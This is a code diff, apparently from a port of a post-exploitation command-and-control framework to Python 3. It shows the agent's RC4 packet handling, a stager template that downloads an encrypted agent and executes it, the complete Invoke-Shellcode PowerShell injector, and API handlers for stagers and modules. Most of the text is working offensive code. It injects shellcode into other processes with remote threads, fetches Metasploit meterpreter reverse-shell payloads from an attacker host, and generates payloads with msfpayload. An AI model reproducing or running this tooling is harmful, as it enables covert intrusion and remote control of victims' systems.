55 | 55 | ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) |
56 | 56 | out, err = ps.communicate() |
57 | parts = out.split("\n") | |
57 | parts = out.split(b"\n") | |
58 | 58 | if len(parts) > 2: |
59 | processName = " ".join(parts[1].split()[4:]) | |
59 | processName = b" ".join(parts[1].split()[4:]) | |
60 | 60 | else: |
61 | 61 | processName = 'python' |
62 | ||
63 | return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion) | |
62 | return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName.decode('UTF-8'), processID, language, pyVersion) |
0 | from __future__ import print_function | |
1 | from builtins import chr | |
2 | from builtins import range | |
3 | 0 | import os |
4 | 1 | import struct |
5 | 2 | |
29 | 26 | |
30 | 27 | def rc4(key, data): |
31 | 28 | """ |
32 | Decrypt/encrypt the passed data using RC4 and the given key. | |
29 | RC4 encrypt/decrypt the given data input with the specified key. | |
30 | ||
31 | From: http://stackoverflow.com/questions/29607753/how-to-decrypt-a-file-that-encrypted-with-rc4-using-python | |
33 | 32 | """ |
34 | S,j,out=list(range(256)),0,[] | |
33 | S, j, out = list(range(256)), 0, [] | |
34 | # This might break python 2.7 | |
35 | key = bytearray(key) | |
36 | # KSA Phase | |
35 | 37 | for i in range(256): |
36 | j=(j+S[i]+ord(key[i%len(key)]))%256 | |
37 | S[i],S[j]=S[j],S[i] | |
38 | i=j=0 | |
38 | j = (j + S[i] + key[i % len(key)]) % 256 | |
39 | S[i], S[j] = S[j], S[i] | |
40 | # this might also break python 2.7 | |
41 | #data = bytearray(data) | |
42 | # PRGA Phase | |
43 | i = j = 0 | |
44 | ||
39 | 45 | for char in data: |
40 | i=(i+1)%256 | |
41 | j=(j+S[i])%256 | |
42 | S[i],S[j]=S[j],S[i] | |
43 | out.append(chr(ord(char)^S[(S[i]+S[j])%256])) | |
44 | return ''.join(out) | |
45 | ||
46 | i = (i + 1) % 256 | |
47 | j = (j + S[i]) % 256 | |
48 | S[i], S[j] = S[j], S[i] | |
49 | if sys.version[0] == "2": | |
50 | char = ord(char) | |
51 | out.append(chr(char ^ S[(S[i] + S[j]) % 256]).encode('latin-1')) | |
52 | #out = str(out) | |
53 | tmp = b''.join(out) | |
54 | return tmp | |
46 | 55 | |
47 | 56 | def parse_routing_packet(stagingKey, data): |
48 | 57 | """ |
81 | 90 | |
82 | 91 | RC4IV = data[0+offset:4+offset] |
83 | 92 | RC4data = data[4+offset:20+offset] |
84 | routingPacket = rc4(RC4IV+stagingKey, RC4data) | |
85 | sessionID = routingPacket[0:8] | |
93 | routingPacket = rc4(RC4IV+stagingKey.encode('UTF-8'), RC4data) | |
94 | ||
95 | sessionID = routingPacket[0:8].decode('UTF-8') | |
96 | ||
86 | 97 | |
87 | 98 | # B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long |
88 | 99 | (language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:]) |
100 | 111 | break |
101 | 112 | |
102 | 113 | offset += 20 + length |
103 | ||
104 | 114 | return results |
105 | 115 | |
106 | 116 | else: |
137 | 147 | |
138 | 148 | # binary pack all of the passed config values as unsigned numbers |
139 | 149 | # B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long |
150 | if isinstance(sessionID, str): | |
151 | sessionID = sessionID.encode('UTF-8') | |
152 | ||
140 | 153 | data = sessionID + struct.pack("=BBHL", 2, meta, additional, len(encData)) |
154 | RC4IV = os.urandom(4) | |
141 | 155 | |
142 | RC4IV = os.urandom(4) | |
156 | if isinstance(data, str): | |
157 | data = data.encode('UTF-8') | |
158 | if isinstance(stagingKey, str): | |
159 | stagingKey = stagingKey.encode('UTF-8') | |
160 | if isinstance(RC4IV, str): | |
161 | RC4IV = RC4IV.encode('UTF-8') | |
162 | if isinstance(encData, str): | |
163 | encData = encData.encode('UTF-8') | |
164 | ||
143 | 165 | key = RC4IV + stagingKey |
166 | ||
167 | if isinstance(key, str): | |
168 | key = key.encode('UTF-8') | |
169 | ||
144 | 170 | rc4EncData = rc4(key, data) |
171 | ||
172 | if isinstance(rc4EncData, str): | |
173 | rc4EncData = rc4EncData.encode('UTF-8') | |
145 | 174 | packet = RC4IV + rc4EncData + encData |
146 | return packet | |
175 | return packet⏎ |
0 | #!/usr/bin/env python | |
0 | #!/usr/bin/env python3 | |
1 | 1 | |
2 | 2 | """ |
3 | 3 | This file is a Jinja2 template. |
9 | 9 | stage_1 |
10 | 10 | stage_2 |
11 | 11 | """ |
12 | from __future__ import print_function | |
12 | 13 | |
14 | import copy | |
13 | 15 | import random |
14 | 16 | import string |
15 | import urllib2 | |
17 | import urllib.request as urllib | |
16 | 18 | |
17 | 19 | {% include 'common/rc4.py' %} |
18 | 20 | {% include 'common/aes.py' %} |
21 | 23 | |
22 | 24 | def post_message(uri, data): |
23 | 25 | global headers |
24 | return (urllib2.urlopen(urllib2.Request(uri, data, headers))).read() | |
26 | return (urllib.urlopen(urllib.Request(uri, data, headers))).read() | |
25 | 27 | |
26 | 28 | # generate a randomized sessionID |
27 | sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in xrange(8)) | |
29 | sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) | |
28 | 30 | |
29 | 31 | # server configuration information |
30 | 32 | stagingKey = '{{ staging_key }}' |
96 | 98 | agent = aes_decrypt_and_verify(key, response) |
97 | 99 | agent = agent.replace('REPLACE_WORKINGHOURS', WorkingHours) |
98 | 100 | agent = agent.replace('REPLACE_KILLDATE', KillDate) |
101 | ||
99 | 102 | exec(agent) |
9 | 9 | License: BSD 3-Clause |
10 | 10 | Required Dependencies: None |
11 | 11 | Optional Dependencies: None |
12 | ||
12 | ||
13 | 13 | .DESCRIPTION |
14 | 14 | |
15 | 15 | Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre |
16 | 16 | |
17 | 17 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): |
18 | 18 | |
19 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- | |
19 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- | |
20 | 20 | |
21 | 21 | Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary. |
22 | ||
22 | ||
23 | 23 | .PARAMETER ProcessID |
24 | 24 | |
25 | 25 | Process ID of the process you want to inject shellcode into. |
37 | 37 | Specifies the IP address of the attack machine waiting to receive the reverse shell |
38 | 38 | |
39 | 39 | .PARAMETER Lport |
40 | ||
40 | ||
41 | 41 | Specifies the port of the attack machine waiting to receive the reverse shell |
42 | 42 | |
43 | 43 | .PARAMETER Payload |
54 | 54 | |
55 | 55 | .PARAMETER Legacy |
56 | 56 | |
57 | Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future. | |
57 | Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future. | |
58 | 58 | |
59 | 59 | .PARAMETER Force |
60 | 60 | |
122 | 122 | .EXAMPLE |
123 | 123 | |
124 | 124 | C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) |
125 | ||
125 | ||
126 | 126 | Description |
127 | 127 | ----------- |
128 | 128 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) |
129 | 129 | Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! |
130 | ||
130 | ||
131 | 131 | .EXAMPLE |
132 | 132 | |
133 | 133 | C:\PS> Invoke-Shellcode -ListMetasploitPayloads |
134 | ||
134 | ||
135 | 135 | Payloads |
136 | 136 | -------- |
137 | 137 | windows/meterpreter/reverse_http |
154 | 154 | [ValidateNotNullOrEmpty()] |
155 | 155 | [UInt16] |
156 | 156 | $ProcessID, |
157 | ||
157 | ||
158 | 158 | [Parameter( ParameterSetName = 'RunLocal' )] |
159 | 159 | [ValidateNotNullOrEmpty()] |
160 | 160 | [Byte[]] |
161 | 161 | $Shellcode, |
162 | ||
162 | ||
163 | 163 | [Parameter( ParameterSetName = 'Metasploit' )] |
164 | 164 | [ValidateSet( 'windows/meterpreter/reverse_http', |
165 | 165 | 'windows/meterpreter/reverse_https', |
166 | 166 | IgnoreCase = $True )] |
167 | 167 | [String] |
168 | 168 | $Payload = 'windows/meterpreter/reverse_http', |
169 | ||
169 | ||
170 | 170 | [Parameter( ParameterSetName = 'ListPayloads' )] |
171 | 171 | [Switch] |
172 | 172 | $ListMetasploitPayloads, |
173 | ||
173 | ||
174 | 174 | [Parameter( Mandatory = $True, |
175 | 175 | ParameterSetName = 'Metasploit' )] |
176 | 176 | [ValidateNotNullOrEmpty()] |
177 | 177 | [String] |
178 | 178 | $Lhost = '127.0.0.1', |
179 | ||
179 | ||
180 | 180 | [Parameter( Mandatory = $True, |
181 | 181 | ParameterSetName = 'Metasploit' )] |
182 | 182 | [ValidateRange( 1,65535 )] |
183 | 183 | [Int] |
184 | 184 | $Lport = 8443, |
185 | ||
185 | ||
186 | 186 | [Parameter( ParameterSetName = 'Metasploit' )] |
187 | 187 | [ValidateNotNull()] |
188 | 188 | [String] |
197 | 197 | [ValidateNotNull()] |
198 | 198 | [Switch] |
199 | 199 | $Proxy = $False, |
200 | ||
200 | ||
201 | 201 | [Switch] |
202 | 202 | $Force = $False |
203 | 203 | ) |
204 | 204 | |
205 | 205 | Set-StrictMode -Version 2.0 |
206 | ||
206 | ||
207 | 207 | # List all available Metasploit payloads and exit the function |
208 | 208 | if ($PsCmdlet.ParameterSetName -eq 'ListPayloads') |
209 | 209 | { |
210 | 210 | $AvailablePayloads = (Get-Command Invoke-Shellcode).Parameters['Payload'].Attributes | |
211 | 211 | Where-Object {$_.TypeId -eq [System.Management.Automation.ValidateSetAttribute]} |
212 | ||
212 | ||
213 | 213 | foreach ($Payload in $AvailablePayloads.ValidValues) |
214 | 214 | { |
215 | 215 | New-Object PSObject -Property @{ Payloads = $Payload } |
216 | 216 | } |
217 | ||
217 | ||
218 | 218 | Return |
219 | 219 | } |
220 | 220 | |
224 | 224 | # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive |
225 | 225 | Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null |
226 | 226 | } |
227 | ||
227 | ||
228 | 228 | function Local:Get-DelegateType |
229 | 229 | { |
230 | 230 | Param |
231 | 231 | ( |
232 | 232 | [OutputType([Type])] |
233 | ||
233 | ||
234 | 234 | [Parameter( Position = 0)] |
235 | 235 | [Type[]] |
236 | 236 | $Parameters = (New-Object Type[](0)), |
237 | ||
237 | ||
238 | 238 | [Parameter( Position = 1 )] |
239 | 239 | [Type] |
240 | 240 | $ReturnType = [Void] |
249 | 249 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') |
250 | 250 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) |
251 | 251 | $MethodBuilder.SetImplementationFlags('Runtime, Managed') |
252 | ||
252 | ||
253 | 253 | Write-Output $TypeBuilder.CreateType() |
254 | 254 | } |
255 | 255 | |
258 | 258 | Param |
259 | 259 | ( |
260 | 260 | [OutputType([IntPtr])] |
261 | ||
261 | ||
262 | 262 | [Parameter( Position = 0, Mandatory = $True )] |
263 | 263 | [String] |
264 | 264 | $Module, |
265 | ||
265 | ||
266 | 266 | [Parameter( Position = 1, Mandatory = $True )] |
267 | 267 | [String] |
268 | 268 | $Procedure |
279 | 279 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) |
280 | 280 | $tmpPtr = New-Object IntPtr |
281 | 281 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) |
282 | ||
282 | ||
283 | 283 | # Return the address of the function |
284 | 284 | Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) |
285 | 285 | } |
294 | 294 | $LittleEndianByteArray = New-Object Byte[](0) |
295 | 295 | $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } } |
296 | 296 | [System.Array]::Reverse($LittleEndianByteArray) |
297 | ||
297 | ||
298 | 298 | Write-Output $LittleEndianByteArray |
299 | 299 | } |
300 | ||
300 | ||
301 | 301 | $CallStub = New-Object Byte[](0) |
302 | ||
302 | ||
303 | 303 | if ($IntSizePtr -eq 8) |
304 | 304 | { |
305 | 305 | [Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode |
320 | 320 | $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread |
321 | 321 | $CallStub += 0xFF,0xD0 # CALL EAX |
322 | 322 | } |
323 | ||
323 | ||
324 | 324 | Write-Output $CallStub |
325 | 325 | } |
326 | 326 | |
328 | 328 | { |
329 | 329 | # Open a handle to the process you want to inject into |
330 | 330 | $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF) |
331 | ||
331 | ||
332 | 332 | if (!$hProcess) |
333 | 333 | { |
334 | 334 | Throw "Unable to open a process handle for PID: $ProcessID" |
340 | 340 | { |
341 | 341 | # Determine is the process specified is 32 or 64 bit |
342 | 342 | $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null |
343 | ||
343 | ||
344 | 344 | if ((!$IsWow64) -and $PowerShell32bit) |
345 | 345 | { |
346 | 346 | Throw 'Unable to inject 64-bit shellcode from within 32-bit Powershell. Use the 64-bit version of Powershell if you want this to work.' |
351 | 351 | { |
352 | 352 | Throw 'No shellcode was placed in the $Shellcode32 variable!' |
353 | 353 | } |
354 | ||
354 | ||
355 | 355 | $Shellcode = $Shellcode32 |
356 | 356 | Write-Verbose 'Injecting into a Wow64 process.' |
357 | 357 | Write-Verbose 'Using 32-bit shellcode.' |
362 | 362 | { |
363 | 363 | Throw 'No shellcode was placed in the $Shellcode64 variable!' |
364 | 364 | } |
365 | ||
365 | ||
366 | 366 | $Shellcode = $Shellcode64 |
367 | 367 | Write-Verbose 'Using 64-bit shellcode.' |
368 | 368 | } |
373 | 373 | { |
374 | 374 | Throw 'No shellcode was placed in the $Shellcode32 variable!' |
375 | 375 | } |
376 | ||
376 | ||
377 | 377 | $Shellcode = $Shellcode32 |
378 | 378 | Write-Verbose 'Using 32-bit shellcode.' |
379 | 379 | } |
380 | 380 | |
381 | 381 | # Reserve and commit enough memory in remote process to hold the shellcode |
382 | 382 | $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) |
383 | ||
383 | ||
384 | 384 | if (!$RemoteMemAddr) |
385 | 385 | { |
386 | 386 | Throw "Unable to allocate shellcode memory in PID: $ProcessID" |
387 | 387 | } |
388 | ||
388 | ||
389 | 389 | Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))" |
390 | 390 | |
391 | 391 | # Copy shellcode into the previously allocated memory |
398 | 398 | { |
399 | 399 | # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread. |
400 | 400 | $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32 |
401 | ||
401 | ||
402 | 402 | Write-Verbose 'Emitting 32-bit assembly call stub.' |
403 | 403 | } |
404 | 404 | else |
405 | 405 | { |
406 | 406 | # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread. |
407 | 407 | $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64 |
408 | ||
408 | ||
409 | 409 | Write-Verbose 'Emitting 64-bit assembly call stub.' |
410 | 410 | } |
411 | 411 | |
412 | 412 | # Allocate inline assembly stub |
413 | 413 | $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX) |
414 | ||
414 | ||
415 | 415 | if (!$RemoteStubAddr) |
416 | 416 | { |
417 | 417 | Throw "Unable to allocate thread call stub memory in PID: $ProcessID" |
418 | 418 | } |
419 | ||
419 | ||
420 | 420 | Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))" |
421 | 421 | |
422 | 422 | # Write 32-bit assembly stub to remote process memory space |
424 | 424 | |
425 | 425 | # Execute shellcode as a remote thread |
426 | 426 | $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero) |
427 | ||
427 | ||
428 | 428 | if (!$ThreadHandle) |
429 | 429 | { |
430 | 430 | Throw "Unable to launch remote thread in PID: $ProcessID" |
444 | 444 | Throw 'No shellcode was placed in the $Shellcode32 variable!' |
445 | 445 | return |
446 | 446 | } |
447 | ||
447 | ||
448 | 448 | $Shellcode = $Shellcode32 |
449 | 449 | Write-Verbose 'Using 32-bit shellcode.' |
450 | 450 | } |
455 | 455 | Throw 'No shellcode was placed in the $Shellcode64 variable!' |
456 | 456 | return |
457 | 457 | } |
458 | ||
458 | ||
459 | 459 | $Shellcode = $Shellcode64 |
460 | 460 | Write-Verbose 'Using 64-bit shellcode.' |
461 | 461 | } |
462 | ||
462 | ||
463 | 463 | # Allocate RWX memory for the shellcode |
464 | 464 | $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) |
465 | 465 | if (!$BaseAddress) |
466 | 466 | { |
467 | 467 | Throw "Unable to allocate shellcode memory in PID: $ProcessID" |
468 | 468 | } |
469 | ||
469 | ||
470 | 470 | Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))" |
471 | 471 | |
472 | 472 | # Copy shellcode to RWX buffer |
473 | 473 | [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length) |
474 | ||
474 | ||
475 | 475 | # Get address of ExitThread function |
476 | 476 | $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread |
477 | ||
477 | ||
478 | 478 | if ($PowerShell32bit) |
479 | 479 | { |
480 | 480 | $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32 |
481 | ||
481 | ||
482 | 482 | Write-Verbose 'Emitting 32-bit assembly call stub.' |
483 | 483 | } |
484 | 484 | else |
485 | 485 | { |
486 | 486 | $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64 |
487 | ||
487 | ||
488 | 488 | Write-Verbose 'Emitting 64-bit assembly call stub.' |
489 | 489 | } |
490 | 490 | |
494 | 494 | { |
495 | 495 | Throw "Unable to allocate thread call stub." |
496 | 496 | } |
497 | ||
497 | ||
498 | 498 | Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))" |
499 | 499 | |
500 | 500 | # Copy call stub to RWX buffer |
509 | 509 | |
510 | 510 | # Wait for shellcode thread to terminate |
511 | 511 | $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null |
512 | ||
512 | ||
513 | 513 | $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) |
514 | 514 | $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) |
515 | 515 | |
522 | 522 | { |
523 | 523 | $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) |
524 | 524 | $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) |
525 | ||
525 | ||
526 | 526 | $64bitCPU = $true |
527 | 527 | } |
528 | 528 | else |
549 | 549 | $RootInvocation = $MyInvocation.Line |
550 | 550 | |
551 | 551 | $Response = $True |
552 | ||
552 | ||
553 | 553 | if ( $Force -or ( $Response = $psCmdlet.ShouldContinue( "Do you want to launch the payload from x86 Powershell?", |
554 | 554 | "Attempt to execute 32-bit shellcode from 64-bit Powershell. Note: This process takes about one minute. Be patient! You will also see some artifacts of the script loading in the other process." ) ) ) { } |
555 | ||
555 | ||
556 | 556 | if ( !$Response ) |
557 | 557 | { |
558 | 558 | # User opted not to launch the 32-bit payload from 32-bit PowerShell. Exit function |
580 | 580 | # Exit the script since the shellcode will be running from x86 PowerShell |
581 | 581 | Return |
582 | 582 | } |
583 | ||
583 | ||
584 | 584 | $Response = $True |
585 | ||
585 | ||
586 | 586 | if ( $Force -or ( $Response = $psCmdlet.ShouldContinue( "Do you know what you're doing?", |
587 | 587 | "About to download Metasploit payload '$($Payload)' LHOST=$($Lhost), LPORT=$($Lport)" ) ) ) { } |
588 | ||
588 | ||
589 | 589 | if ( !$Response ) |
590 | 590 | { |
591 | 591 | # User opted not to carry out download of Metasploit payload. Exit function |
592 | 592 | Return |
593 | 593 | } |
594 | ||
594 | ||
595 | 595 | switch ($Payload) |
596 | 596 | { |
597 | 597 | 'windows/meterpreter/reverse_http' |
598 | 598 | { |
599 | 599 | $SSL = '' |
600 | 600 | } |
601 | ||
601 | ||
602 | 602 | 'windows/meterpreter/reverse_https' |
603 | 603 | { |
604 | 604 | $SSL = 's' |
606 | 606 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True} |
607 | 607 | } |
608 | 608 | } |
609 | ||
610 | if ($Legacy) | |
609 | ||
610 | if ($Legacy) | |
611 | 611 | { |
612 | 612 | # Old Meterpreter handler expects 'INITM' in the URI in order to initiate stage 0 |
613 | 613 | $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM" |
618 | 618 | $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_} |
619 | 619 | $SumTest = $False |
620 | 620 | |
621 | while ($SumTest -eq $False) | |
621 | while ($SumTest -eq $False) | |
622 | 622 | { |
623 | 623 | $GeneratedUri = $CharArray | Get-Random -Count 4 |
624 | 624 | $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92) |
626 | 626 | |
627 | 627 | $RequestUri = -join $GeneratedUri |
628 | 628 | |
629 | $Request = "http$($SSL)://$($Lhost):$($Lport)/$($RequestUri)" | |
630 | } | |
631 | ||
629 | $Request = "http$($SSL)://$($Lhost):$($Lport)/$($RequestUri)" | |
630 | } | |
631 | ||
632 | 632 | $Uri = New-Object Uri($Request) |
633 | 633 | $WebClient = New-Object System.Net.WebClient |
634 | 634 | $WebClient.Headers.Add('user-agent', "$UserAgent") |
635 | ||
635 | ||
636 | 636 | if ($Proxy) |
637 | 637 | { |
638 | 638 | $WebProxyObject = New-Object System.Net.WebProxy |
639 | 639 | $ProxyAddress = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').ProxyServer |
640 | ||
640 | ||
641 | 641 | # if there is no proxy set, then continue without it |
642 | if ($ProxyAddress) | |
643 | { | |
644 | ||
642 | if ($ProxyAddress) | |
643 | { | |
644 | ||
645 | 645 | $WebProxyObject.Address = $ProxyAddress |
646 | 646 | $WebProxyObject.UseDefaultCredentials = $True |
647 | 647 | $WebClientObject.Proxy = $WebProxyObject |
654 | 654 | } |
655 | 655 | catch |
656 | 656 | { |
657 | Throw "$($Error[0].Exception.InnerException.InnerException.Message)" | |
657 | Throw "$($Error[0])" | |
658 | 658 | } |
659 | 659 | [Byte[]] $Shellcode64 = $Shellcode32 |
660 | 660 | |
726 | 726 | $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle |
727 | 727 | $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) |
728 | 728 | $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) |
729 | ||
729 | ||
730 | 730 | Write-Verbose "Injecting shellcode into PID: $ProcessId" |
731 | ||
731 | ||
732 | 732 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', |
733 | 733 | "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) ) |
734 | 734 | { |
750 | 750 | $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject |
751 | 751 | $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int]) |
752 | 752 | $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) |
753 | ||
753 | ||
754 | 754 | Write-Verbose "Injecting shellcode into PowerShell" |
755 | ||
755 | ||
756 | 756 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', |
757 | 757 | "Injecting shellcode into the running PowerShell process!" ) ) |
758 | 758 | { |
759 | 759 | Inject-LocalShellcode |
760 | 760 | } |
761 | } | |
761 | } | |
762 | 762 | }⏎ |
77 | 77 | """ |
78 | 78 | |
79 | 79 | # generate a randomized API token |
80 | apiToken = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
80 | rng = random.SystemRandom() | |
81 | apiToken = ''.join(rng.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
81 | 82 | |
82 | 83 | execute_db_query(conn, "UPDATE config SET api_current_token=?", [apiToken]) |
83 | 84 | |
94 | 95 | permanentToken = execute_db_query(conn, "SELECT api_permanent_token FROM config")[0] |
95 | 96 | permanentToken = permanentToken[0] |
96 | 97 | if not permanentToken: |
97 | permanentToken = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
98 | rng = random.SystemRandom() | |
99 | permanentToken = ''.join(rng.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
98 | 100 | execute_db_query(conn, "UPDATE config SET api_permanent_token=?", [permanentToken]) |
99 | 101 | |
100 | 102 | return permanentToken |
304 | 306 | """ |
305 | 307 | |
306 | 308 | stagers = [] |
307 | for stagerName, stager in main.stagers.stagers.iteritems(): | |
309 | for stagerName, stager in main.stagers.stagers.items(): | |
308 | 310 | info = copy.deepcopy(stager.info) |
309 | 311 | info['options'] = stager.options |
310 | 312 | info['Name'] = stagerName |
322 | 324 | return make_response(jsonify({'error': 'stager name %s not found, make sure to use [os]/[name] format, ie. windows/dll' %(stager_name)}), 404) |
323 | 325 | |
324 | 326 | stagers = [] |
325 | for stagerName, stager in main.stagers.stagers.iteritems(): | |
327 | for stagerName, stager in main.stagers.stagers.items(): | |
326 | 328 | if stagerName == stager_name: |
327 | 329 | info = copy.deepcopy(stager.info) |
328 | 330 | info['options'] = stager.options |
357 | 359 | stager = main.stagers.stagers[stagerName] |
358 | 360 | |
359 | 361 | # set all passed options |
360 | for option, values in request.json.iteritems(): | |
362 | for option, values in request.json.items(): | |
361 | 363 | if option != 'StagerName': |
362 | 364 | if option not in stager.options: |
363 | 365 | return make_response(jsonify({'error': 'Invalid option %s, check capitalization.' %(option)}), 400) |
364 | 366 | stager.options[option]['Value'] = values |
365 | 367 | |
366 | 368 | # validate stager options |
367 | for option, values in stager.options.iteritems(): | |
369 | for option, values in stager.options.items(): | |
368 | 370 | if values['Required'] and ((not values['Value']) or (values['Value'] == '')): |
369 | 371 | return make_response(jsonify({'error': 'required stager options missing'}), 400) |
370 | 372 | |
387 | 389 | """ |
388 | 390 | |
389 | 391 | modules = [] |
390 | for moduleName, module in main.modules.modules.iteritems(): | |
392 | for moduleName, module in main.modules.modules.items(): | |
391 | 393 | moduleInfo = copy.deepcopy(module.info) |
392 | 394 | moduleInfo['options'] = module.options |
393 | 395 | moduleInfo['Name'] = moduleName |
430 | 432 | module = main.modules.modules[module_name] |
431 | 433 | |
432 | 434 | # set all passed module options |
433 | for key, value in request.json.iteritems(): | |
435 | for key, value in request.json.items(): | |
434 | 436 | if key not in module.options: |
435 | 437 | return make_response(jsonify({'error': 'invalid module option'}), 400) |
436 | 438 | |
439 | 441 | # validate module options |
440 | 442 | sessionID = module.options['Agent']['Value'] |
441 | 443 | |
442 | for option, values in module.options.iteritems(): | |
444 | for option, values in module.options.items(): | |
443 | 445 | if values['Required'] and ((not values['Value']) or (values['Value'] == '')): |
444 | 446 | return make_response(jsonify({'error': 'required module option missing'}), 400) |
445 | 447 | |
542 | 544 | |
543 | 545 | modules = [] |
544 | 546 | |
545 | for moduleName, module in main.modules.modules.iteritems(): | |
547 | for moduleName, module in main.modules.modules.items(): | |
546 | 548 | if (searchTerm.lower() == '') or (searchTerm.lower() in moduleName.lower()) or (searchTerm.lower() in ("".join(module.info['Description'])).lower()) or (searchTerm.lower() in ("".join(module.info['Comments'])).lower()) or (searchTerm.lower() in ("".join(module.info['Author'])).lower()): |
547 | 549 | |
548 | 550 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
567 | 569 | |
568 | 570 | modules = [] |
569 | 571 | |
570 | for moduleName, module in main.modules.modules.iteritems(): | |
572 | for moduleName, module in main.modules.modules.items(): | |
571 | 573 | if (searchTerm.lower() == '') or (searchTerm.lower() in moduleName.lower()): |
572 | 574 | |
